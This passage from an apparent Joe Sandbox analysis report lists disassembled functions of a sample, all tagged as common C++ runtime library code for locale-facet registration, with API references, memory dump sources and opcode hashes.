                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
                                                                  • String ID:
                                                                  • API String ID: 743221004-0
                                                                  • Opcode ID: 997f840934198602fd2e2522f257cec440d9961bae2683d9002c80b2369e3af5
                                                                  • Instruction ID: 4eca31e01553ec6d2eb32eca6f5ca3fae05dccc11efecd11d42ebeb15338c6dd
                                                                  • Opcode Fuzzy Hash: 997f840934198602fd2e2522f257cec440d9961bae2683d9002c80b2369e3af5
                                                                  • Instruction Fuzzy Hash: A411CE35900229DFCB08FB64A8616BE77F0FF84710F240499E4186B291CF749E008B91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B322FA Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00B32301
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B3230B
                                                                    • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
                                                                    • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
                                                                  • codecvt.LIBCPMT ref: 00B32345
                                                                  • std::_Facet_Register.LIBCPMT ref: 00B3235C
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B3237C
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                  • String ID:
                                                                  • API String ID: 712880209-0
                                                                  • Opcode ID: bf5024d4c414189240e9fa81042a38ea7b751166e347da3813682fa6242e924a
                                                                  • Instruction ID: 6151922555fd80fd301542f3c580e4af2a09c4dd32635290952439368df75fdb
                                                                  • Opcode Fuzzy Hash: bf5024d4c414189240e9fa81042a38ea7b751166e347da3813682fa6242e924a
                                                                  • Instruction Fuzzy Hash: 1001AD359001299FCB15AB64A851ABEB7F1AF84B20F240589E518AB291CF789E008B91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B3238F Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00B32396
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B323A0
                                                                    • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
                                                                    • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
                                                                  • codecvt.LIBCPMT ref: 00B323DA
                                                                  • std::_Facet_Register.LIBCPMT ref: 00B323F1
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B32411
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                  • String ID:
                                                                  • API String ID: 712880209-0
                                                                  • Opcode ID: 856d80a25d254a0ad933c5039299c814f2bfd186e8a14e82cdea29088eb2f7d2
                                                                  • Instruction ID: 9d0533c98a7f3bf42f3e15bce01f766fb7e9c698d44adcb515704eea0c5b4927
                                                                  • Opcode Fuzzy Hash: 856d80a25d254a0ad933c5039299c814f2bfd186e8a14e82cdea29088eb2f7d2
                                                                  • Instruction Fuzzy Hash: 38010C32A00129DFCB04EB6498516BEB7F0FF84B20F380488E5196B2D1CFB89E44CB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B324B9 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00B324C0
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B324CA
                                                                    • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
                                                                    • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
                                                                  • collate.LIBCPMT ref: 00B32504
                                                                  • std::_Facet_Register.LIBCPMT ref: 00B3251B
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B3253B
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                  • String ID:
                                                                  • API String ID: 1007100420-0
                                                                  • Opcode ID: 49716626864c88f18a6b621498ccd982c81bd39db475c3ddf9cdb11a5d14c002
                                                                  • Instruction ID: 891039dd8b435a6e997bf09db1b3415693e49923a555df53cb91ef0083267695
                                                                  • Opcode Fuzzy Hash: 49716626864c88f18a6b621498ccd982c81bd39db475c3ddf9cdb11a5d14c002
                                                                  • Instruction Fuzzy Hash: DE01C031901129DBCB05EB64E8556BEB7F0FF94720F350489E5146B291CF749F408B91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B32424 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00B3242B
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B32435
                                                                    • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
                                                                    • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
                                                                  • collate.LIBCPMT ref: 00B3246F
                                                                  • std::_Facet_Register.LIBCPMT ref: 00B32486
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B324A6
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                  • String ID:
                                                                  • API String ID: 1007100420-0
                                                                  • Opcode ID: ca7e612f7e1027b65902dd1ee16b4071801e100a6e5153f2ec03f4454af7eb4d
                                                                  • Instruction ID: ceaba4a995b7eb393a18210a6eb3a36ddde2e63ac603ef73ce056a1f8fa55cd4
                                                                  • Opcode Fuzzy Hash: ca7e612f7e1027b65902dd1ee16b4071801e100a6e5153f2ec03f4454af7eb4d
                                                                  • Instruction Fuzzy Hash: C201AD35900129DBCB01AB64E8516BEBBF0AF84720F380489E5156B391DFB49E00CB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B325E3 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00B325EA
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B325F4
                                                                    • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
                                                                    • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
                                                                  • messages.LIBCPMT ref: 00B3262E
                                                                  • std::_Facet_Register.LIBCPMT ref: 00B32645
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B32665
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                  • String ID:
                                                                  • API String ID: 2750803064-0
                                                                  • Opcode ID: 3b31f5a75a5a47b53d977e3d3419ed5bddf843166ff0b9813704297aff99a519
                                                                  • Instruction ID: 6d9debaeec9d0814ddff32093b10cd729699ca70312d36f2ac2e303b5915ad4a
                                                                  • Opcode Fuzzy Hash: 3b31f5a75a5a47b53d977e3d3419ed5bddf843166ff0b9813704297aff99a519
                                                                  • Instruction Fuzzy Hash: D501C0359001299BCB01EB649822ABEB7F0FF94710F244489F4156B291CF749E00CB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B3254E Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00B32555
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B3255F
                                                                    • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
                                                                    • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
                                                                  • ctype.LIBCPMT ref: 00B32599
                                                                  • std::_Facet_Register.LIBCPMT ref: 00B325B0
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B325D0
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registerctype
                                                                  • String ID:
                                                                  • API String ID: 83828444-0
                                                                  • Opcode ID: d5083220fce01bdaa7a0978498b3c9256264263995be9685c4a05a25ad9f6db1
                                                                  • Instruction ID: 8d84522df08e821f2870e6b422509bdf34c9fe7f163c3d10f17b57abfe101855
                                                                  • Opcode Fuzzy Hash: d5083220fce01bdaa7a0978498b3c9256264263995be9685c4a05a25ad9f6db1
                                                                  • Instruction Fuzzy Hash: 7401A9329011299BCB05AB649865AAEB7F0BF94720F290489E419AB2D2DF749F448B91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B2D6BD Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00B2D6C4
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B2D6CE
                                                                    • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
                                                                    • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
                                                                  • codecvt.LIBCPMT ref: 00B2D708
                                                                  • std::_Facet_Register.LIBCPMT ref: 00B2D71F
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B2D73F
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                  • String ID:
                                                                  • API String ID: 712880209-0
                                                                  • Opcode ID: 3c2bfca06814954ad0095a086ca299cbe859d8d9760f33be8fae29384455d87e
                                                                  • Instruction ID: f216c860af85c546f289dff36862396d41d28dbe48b58050af102f854d9bf6a1
                                                                  • Opcode Fuzzy Hash: 3c2bfca06814954ad0095a086ca299cbe859d8d9760f33be8fae29384455d87e
                                                                  • Instruction Fuzzy Hash: BC0180359101299BCB15FB64A851ABE77F1FF84721F240589E4186B292CF789E418791
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B32678 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00B3267F
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B32689
                                                                    • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
                                                                    • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
                                                                  • messages.LIBCPMT ref: 00B326C3
                                                                  • std::_Facet_Register.LIBCPMT ref: 00B326DA
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B326FA
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                  • String ID:
                                                                  • API String ID: 2750803064-0
                                                                  • Opcode ID: 329d1742e92d40130efdbfabda965c5e950103c759a309fae538b0c1ad96b325
                                                                  • Instruction ID: 618d6440c26934efb7c93e462eaaafd23ee8a7c8510e27ea1f0b375b602d4c99
                                                                  • Opcode Fuzzy Hash: 329d1742e92d40130efdbfabda965c5e950103c759a309fae538b0c1ad96b325
                                                                  • Instruction Fuzzy Hash: 0E01CC36910129DFCB05FBA4D852ABEB7F0FF84720F284489E5186B291CFB49E018B91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B3E8D8 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00B3E8DF
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B3E8E9
                                                                    • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
                                                                    • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
                                                                  • messages.LIBCPMT ref: 00B3E923
                                                                  • std::_Facet_Register.LIBCPMT ref: 00B3E93A
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B3E95A
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                  • String ID:
                                                                  • API String ID: 2750803064-0
                                                                  • Opcode ID: 983ab9e5d47e5ec0b8f63195dc447f6a78caf096343024ba3a959f62f523b6d9
                                                                  • Instruction ID: 5bac0020d55aa57e345eaf6a71c483d603cb3ea8ca1333d7b7ac93075eef4db2
                                                                  • Opcode Fuzzy Hash: 983ab9e5d47e5ec0b8f63195dc447f6a78caf096343024ba3a959f62f523b6d9
                                                                  • Instruction Fuzzy Hash: 020180369001299FCB15EB649855ABE77F1FF84720F29068AF5286B2D1CF74DE008791
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B3E843 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00B3E84A
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B3E854
                                                                    • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
                                                                    • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
                                                                  • collate.LIBCPMT ref: 00B3E88E
                                                                  • std::_Facet_Register.LIBCPMT ref: 00B3E8A5
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B3E8C5
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                  • String ID:
                                                                  • API String ID: 1007100420-0
                                                                  • Opcode ID: ee9c25c7b7aacadfb466cf43e66a1585a0be523c43b4f1052451b38ad6f67e8a
                                                                  • Instruction ID: bff6490bef891528132c7fc3db5315098fed8c88970b03582eee780bfdfa8ee7
                                                                  • Opcode Fuzzy Hash: ee9c25c7b7aacadfb466cf43e66a1585a0be523c43b4f1052451b38ad6f67e8a
                                                                  • Instruction Fuzzy Hash: 0301AD36D001299BCB05FB6498116AEB7F0FF84710F24448AE4246B2D1CF749E00CB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B329F6 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00B329FD
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B32A07
                                                                    • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
                                                                    • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
                                                                  • moneypunct.LIBCPMT ref: 00B32A41
                                                                  • std::_Facet_Register.LIBCPMT ref: 00B32A58
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B32A78
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                  • String ID:
                                                                  • API String ID: 419941038-0
                                                                  • Opcode ID: 2cba51b2687b16d28a3399cbbf544c4666b3b1b7454221e978688660bcf678b7
                                                                  • Instruction ID: 1a89eaffebaa5f92e56c7744c1ebfba81c9860ad6f205c092af571a430d2b092
                                                                  • Opcode Fuzzy Hash: 2cba51b2687b16d28a3399cbbf544c4666b3b1b7454221e978688660bcf678b7
                                                                  • Instruction Fuzzy Hash: 6701C035900129DBCB11EBA4D8516BEB7F1FF84720F340489E5146B291CF749E018791
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B32961 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00B32968
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B32972
                                                                    • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
                                                                    • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
                                                                  • moneypunct.LIBCPMT ref: 00B329AC
                                                                  • std::_Facet_Register.LIBCPMT ref: 00B329C3
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B329E3
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                  • String ID:
                                                                  • API String ID: 419941038-0
                                                                  • Opcode ID: 2dd4b9739a82485e49d63adc3f0171921b6d48f252d6ecafd1ca7acf427e250d
                                                                  • Instruction ID: 71e958beda0dad02b511b2bfa265525b86c3fde1999da43509f35bba42aedb42
                                                                  • Opcode Fuzzy Hash: 2dd4b9739a82485e49d63adc3f0171921b6d48f252d6ecafd1ca7acf427e250d
                                                                  • Instruction Fuzzy Hash: 3801C031900129DBCB01EB64D812ABEB7F0FF84720F250599E5146B291CF749E008B91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B3EA97 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00B3EA9E
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B3EAA8
                                                                    • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
                                                                    • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
                                                                  • moneypunct.LIBCPMT ref: 00B3EAE2
                                                                  • std::_Facet_Register.LIBCPMT ref: 00B3EAF9
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B3EB19
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                  • String ID:
                                                                  • API String ID: 419941038-0
                                                                  • Opcode ID: 69ec42b5e914625778a0eb25f19c611e8f7aa10033252a791dcaa21f3a59039e
                                                                  • Instruction ID: a12f8b9fddd96a81f143633d5748d929734cab47d3f8804802b0153e71291788
                                                                  • Opcode Fuzzy Hash: 69ec42b5e914625778a0eb25f19c611e8f7aa10033252a791dcaa21f3a59039e
                                                                  • Instruction Fuzzy Hash: 6A01A9329001299BCB11AB649851AAEB7F1FF84720F28048AF4296B2D2DF749E018B91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B32A8B Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00B32A92
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B32A9C
                                                                    • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
                                                                    • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
                                                                  • moneypunct.LIBCPMT ref: 00B32AD6
                                                                  • std::_Facet_Register.LIBCPMT ref: 00B32AED
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B32B0D
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
